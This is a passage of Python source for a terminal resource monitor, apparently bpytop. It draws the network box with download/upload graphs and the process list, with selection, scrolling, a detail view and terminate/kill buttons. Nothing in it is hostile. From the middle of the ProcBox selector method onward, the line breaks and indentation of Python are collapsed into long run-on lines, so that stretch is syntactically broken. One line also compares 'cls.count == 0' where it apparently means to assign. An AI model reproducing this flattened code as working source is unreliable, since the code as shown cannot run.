					out += f'{Meters.disks_used[name]}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
					cy += 2
					#* Show free-space row only when all disks fit with three rows each
					if len(mem.disks) * 3 <= h + 1:
						if cy > h - 1: break
						out += Mv.to(y+cy, x+cx)
						out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
						out += f'{Meters.disks_free[name]}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
						cy += 1
						if len(mem.disks) * 4 <= h + 1: cy += 1
		except (KeyError, TypeError):
			#* Collector data can be mid-update; skip this frame rather than crash
			return
		Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
		cls.resized = cls.redraw = False

class NetBox(Box, SubBox):
	name = "net"
	height_p = 30
	width_p = 45
	x = 1
	y = 1
	resized: bool = True
	redraw: bool = True
	graph_height: Dict[str, int] = {}
	symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
	buffer: str = "net"
	Box.buffers.append(buffer)

	@classmethod
	def _calc_size(cls):
		'''Size the net box to the space left below the cpu and mem boxes.'''
		width_p: int
		if cls.stat_mode:
			width_p = 100
		else:
			width_p = cls.width_p
		cls.width = round(Term.width * width_p / 100)
		cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
		cls.y = Term.height - cls.height + 1
		cls.box_width = 27 if cls.width > 45 else 19
		cls.box_height = 9 if cls.height > 10 else cls.height - 2
		cls.box_x = cls.width - cls.box_width - 1
		cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
		#* Download graph gets the top half, upload the remainder
		cls.graph_height["download"] = round((cls.height - 2) / 2)
		cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
		cls.redraw = True

	@classmethod
	def _draw_bg(cls) -> str:
		'''Return the static outline: the net box and the Download/Upload stats sub-box.'''
		if cls.proc_mode: return ""
		return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'

	@classmethod
	def _draw_fg(cls):
		'''Draw the dynamic net box contents: speed graphs, rate strings and the NIC/toggle buttons.'''
		if cls.proc_mode: return
		net = NetCollector
		if net.redraw: cls.redraw = True
		if not net.nic: return
		out: str = ""
		out_misc: str = ""
		x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
		bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
		reset: bool = bool(net.stats[net.nic]["download"]["offset"])
		if cls.resized or cls.redraw:
			out_misc += cls._draw_bg()
			#* Clickable buttons: z(ero), <b / n> nic switch, a(uto), s-y-nc
			if not "b" in Key.mouse:
				Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
				Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
				Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
			out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
				f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
				f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
			if w - len(net.nic[:10]) - 20 > 6:
				if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
				out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
					f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
			if w - len(net.nic[:10]) - 20 > 13:
				if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
				out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
					f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
		Draw.buffer("net_misc", out_misc, only_save=True)
		cy = 0
		for direction in ["download", "upload"]:
			strings = net.strings[net.nic][direction]
			stats = net.stats[net.nic][direction]
			if cls.redraw: stats["redraw"] = True
			if stats["redraw"] or cls.resized:
				Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"], invert=direction != "download",
color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
			out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
			out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
				("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
			cy += 1 if bh != 3 else 2
			#* Top and Total rows shown only if the stats sub-box is tall enough
			if bh >= 6:
				out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
				cy += 1
			if bh >= 4:
				out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
				if bh > 2 and bh % 2: cy += 2
				else: cy += 1
			stats["redraw"] = False
		out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
			f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
		Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
		cls.redraw = cls.resized = False

class ProcBox(Box):
	name = "proc"
	height_p = 68
	width_p = 55
	x = 1
	y = 1
	current_y: int = 0
	current_h: int = 0
	select_max: int = 0        # number of selectable rows that fit in the box
	selected: int = 0          # 0 = nothing selected, otherwise row index
	selected_pid: int = 0
	last_selection: int = 0
	filtering: bool = False
	moved: bool = False
	start: int = 1             # index of first visible process (1-based scroll offset)
	count: int = 0
	s_len: int = 0
	detailed: bool = False
	detailed_x: int = 0
	detailed_y: int = 0
	detailed_width: int = 0
	detailed_height: int = 8
	resized: bool = True
	redraw: bool = True
	buffer: str = "proc"
	pid_counter: Dict[int, int] = {}
	Box.buffers.append(buffer)

	@classmethod
	def _calc_size(cls):
		'''Calculate box dimensions; fills the width right of the mem/net column, below the cpu box.'''
		width_p: int; height_p: int
		if cls.proc_mode:
			width_p, height_p = 100, 80
		else:
			width_p, height_p = cls.width_p, cls.height_p
		cls.width = round(Term.width * width_p / 100)
		cls.height = round(Term.height * height_p / 100)
		if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
		cls.x = Term.width - cls.width + 1
		cls.y = Box._b_cpu_h + 1
		cls.current_y = cls.y
		cls.current_h = cls.height
		cls.select_max = cls.height - 3
		cls.redraw = True
		cls.resized = True

	@classmethod
	def _draw_bg(cls) -> str:
		'''Return the static box outline.'''
		if cls.stat_mode: return ""
		return create_box(box=cls, line_color=THEME.proc_box)

	@classmethod
	def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
		'''Update scroll offset and selected row from a navigation key or mouse event, then trigger a redraw.'''
		old: Tuple[int, int] = (cls.start, cls.selected)
		new_sel: int
		if key == "up":
			if cls.selected == 1 and cls.start > 1:
				cls.start -= 1
			elif cls.selected == 1:
				cls.selected = 0
			elif cls.selected > 1:
				cls.selected -= 1
		elif key == "down":
			#* Leaving the detailed view restores the previously selected row
			if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
				cls.selected = cls.last_selection
				cls.last_selection = 0
			if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
				cls.start += 1
			elif cls.selected < cls.select_max:
				cls.selected += 1
		elif key == "mouse_scroll_up" and cls.start > 1:
			cls.start -= 5
		elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
			cls.start += 5
		elif key == "page_up" and cls.start > 1:
			cls.start -= cls.select_max
		elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
			cls.start += cls.select_max
		elif key == "home":
			if cls.start > 1: cls.start = 1
			elif cls.selected > 0: cls.selected = 0
		elif key == "end":
			if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
			elif cls.selected < cls.select_max: cls.selected = cls.select_max
		elif key == "mouse_click":
			#* Click on the scrollbar column jumps the view; click on a row selects it
			if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
				if mouse_pos[1] == cls.current_y + 2:
					cls.start = 1
				elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
					cls.start = ProcCollector.num_procs - cls.select_max + 1
				else:
					cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) /
(cls.select_max - 2))) else: new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0 if new_sel > 0 and new_sel == cls.selected: Key.list.insert(0, "enter") return elif new_sel > 0 and new_sel != cls.selected: if cls.last_selection: cls.last_selection = 0 cls.selected = new_sel elif key == "mouse_unselect": cls.selected = 0 if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1 elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs if cls.start < 1: cls.start = 1 if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs elif cls.selected > cls.select_max: cls.selected = cls.select_max if cls.selected < 0: cls.selected = 0 if old != (cls.start, cls.selected): cls.moved = True Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True) @classmethod def _draw_fg(cls): if cls.stat_mode: return proc = ProcCollector if proc.proc_interrupt: return if proc.redraw: cls.redraw = True out: str = "" out_misc: str = "" n: int = 0 x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2 prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int dgx: int; dgw: int; dx: int; dw: int; dy: int l_count: int = 0 scroll_pos: int = 0 killed: bool = True indent: str = "" offset: int = 0 tr_show: bool = True usr_show: bool = True vals: List[str] g_color: str = "" s_len: int = 0 if proc.search_filter: s_len = len(proc.search_filter[:10]) loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}' end: str = "" if proc.detailed: dgx, dgw = x, w // 3 dw = w - dgw - 1 if dw > 120: dw = 120 dgw = w - 121 dx = x + dgw + 2 dy = cls.y + 1 if w > 67: arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0) prog_len = 15 else: arg_len 
= 0 prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0) if prog_len < 15: tr_show = False prog_len += 5 if prog_len < 12: usr_show = False prog_len += 9 if CONFIG.proc_tree: tree_len = arg_len + prog_len + 6 arg_len = 0 #* Buttons and titles only redrawn if needed if cls.resized or cls.redraw: s_len += len(CONFIG.proc_sorting) if cls.resized or s_len != cls.s_len or proc.detailed: cls.s_len = s_len for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]: if k in Key.mouse: del Key.mouse[k] if proc.detailed: killed = proc.details["killed"] main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented: cls.current_y = cls.y + 8 cls.current_h = cls.height - 8 for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}' out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}' f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}') for i in range(7): out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}' out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}' f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}' f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}' f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if cls.selected == 0: Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)] if cls.selected == 0 and not killed: Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)] out_misc += (f'{Mv.to(dy-1, dx+dw - 
11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}' f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if dw > 28: if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if dw > 39: if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if Graphs.detailed_cpu is NotImplemented or cls.resized: Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu) Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem) cls.select_max = cls.height - 11 y = cls.y + 9 h = cls.height - 10 else: if cls.current_y != cls.y or cls.resized: cls.current_y = cls.y cls.current_h = cls.height y, h = cls.y + 1, cls.height - 2 out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}' f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}' f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}') cls.select_max = cls.height - 3 sort_pos = x + w - len(CONFIG.proc_sorting) - 7 if not "left" in Key.mouse: Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)] Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)] out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' + ("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") + f'{Mv.to(y-1, 
sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} ' f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if w > 29 + s_len: if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)] out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}' f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if w > 37 + s_len: if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)] out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}' f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if w > 47 + s_len: if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)] out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}' f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+5 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))] if proc.search_filter: if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+11 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)] elif "delete" in Key.mouse: del Key.mouse["delete"] out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' + ("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') + f'{THEME.proc_box(Symbol.title_right)}') main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg title = 
THEME.inactive_fg if cls.selected == 0 else THEME.title out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}' f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}' f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}' f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}') if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)] if w - len(loc_string) > 34: if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if w - len(loc_string) > 40: if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if w - len(loc_string) > 51: if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if CONFIG.proc_tree and w - len(loc_string) > 65: if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}' #* Processes labels selected: str = CONFIG.proc_sorting label: str if selected == "memory": selected = "mem" if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr" if CONFIG.proc_tree: label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' + (" " if proc.num_procs > cls.select_max else "")) if selected in ["pid", 
"program", "arguments"]: selected = "tree" else: label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") + ((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' + (" " if proc.num_procs > cls.select_max else "")) if selected == "program" and prog_len <= 8: selected = "prg" selected = selected.split(" ")[0].capitalize() if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB") label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}') out_misc += label Draw.buffer("proc_misc", out_misc, only_save=True) #* Detailed box draw if proc.detailed: if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}' else: stat_color = "" expand = proc.expand iw = (dw - 3) // (4 + expand) iw2 = iw - 1 out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}' f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}') for i, l in enumerate(["C", "P", "U"]): out += f'{Mv.to(dy+2+i, dgx)}{l}' for i, l in enumerate(["C", "M", "D"]): out += f'{Mv.to(dy+4+i, dx+1)}{l}' out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' + (f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") + (f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") + (f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") + (f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") + f'{Mv.to(dy+1, 
dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' + (f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") + (f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") + (f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") + (f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") + f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}' f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} ' f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}') cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5) for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))): out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}' if i == 2: break #* Checking for selection out of bounds if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1 elif cls.start > proc.num_procs: cls.start = proc.num_procs if cls.start < 1: cls.start = 1 if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs elif cls.selected > cls.select_max: cls.selected = cls.select_max if cls.selected < 0: cls.selected = 0 #* Start iteration over all processes and info cy = 1 for n, (pid, items) in enumerate(proc.processes.items(), start=1): if n < cls.start: continue l_count += 1 if l_count == cls.selected: is_selected = True cls.selected_pid = pid else: is_selected = False indent, name, cmd, threads, 
username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]] if CONFIG.proc_tree: arg_len = 0 offset = tree_len - len(f'{indent}{pid}') if offset < 1: offset = 0 indent = f'{indent:.{tree_len - len(str(pid))}}' if offset - len(name) > 12: cmd = cmd.split(" ")[0].split("/")[-1] if not cmd.startswith(name): offset = len(name) arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2 cmd = f'({cmd[:(arg_len-4)]})' else: offset = prog_len - 1 if cpu > 1.0 or pid in Graphs.pid_cpu: if pid not in Graphs.pid_cpu: Graphs.pid_cpu[pid] = Graph(5, 1, None, [0]) cls.pid_counter[pid] = 0 elif cpu < 1.0: cls.pid_counter[pid] += 1 if cls.pid_counter[pid] > 10: del cls.pid_counter[pid], Graphs.pid_cpu[pid] else: cls.pid_counter[pid] = 0 end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub if cls.selected > cy: calc = cls.selected - cy elif 0 < cls.selected <= cy: calc = cy - cls.selected else: calc = cy if CONFIG.proc_colors and not is_selected: vals = [] for v in [int(cpu), int(mem), int(threads // 3)]: if CONFIG.proc_gradient: val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}'] else: vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}'] c_color, m_color, t_color = vals else: c_color = m_color = t_color = Fx.b if CONFIG.proc_gradient and not is_selected: g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}' if is_selected: c_color = m_color = t_color = g_color = end = "" out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}' #* Creates one line for a process with all gathered information out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' + f'{c_color}{name:<{offset}.{offset}} {end}' + (f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") + (t_color + (f'{threads:>4} ' 
if threads < 1000 else "999> ") + end if tr_show else "") + (g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") + m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end + f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end + (" " if proc.num_procs > cls.select_max else "")) #* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates if pid in Graphs.pid_cpu: out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}' if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}' cy += 1 if cy == h: break if cy < h: for i in range(h-cy): out += f'{Mv.to(y+cy+i, x)}{" " * w}' #* Draw scrollbar if needed if proc.num_procs > cls.select_max: if cls.resized: Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)] Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)] scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2))) if scroll_pos < 0 or cls.start == 1: scroll_pos = 0 elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3 out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}' f'{Mv.to(y+1+scroll_pos, x+w-1)}█') elif "scroll_up" in Key.mouse: del Key.mouse["scroll_up"], Key.mouse["scroll_down"] #* Draw current selection and number of processes out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}' f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') #* Clean up dead processes graphs and counters cls.count += 1 if cls.count == 100: cls.count == 0 
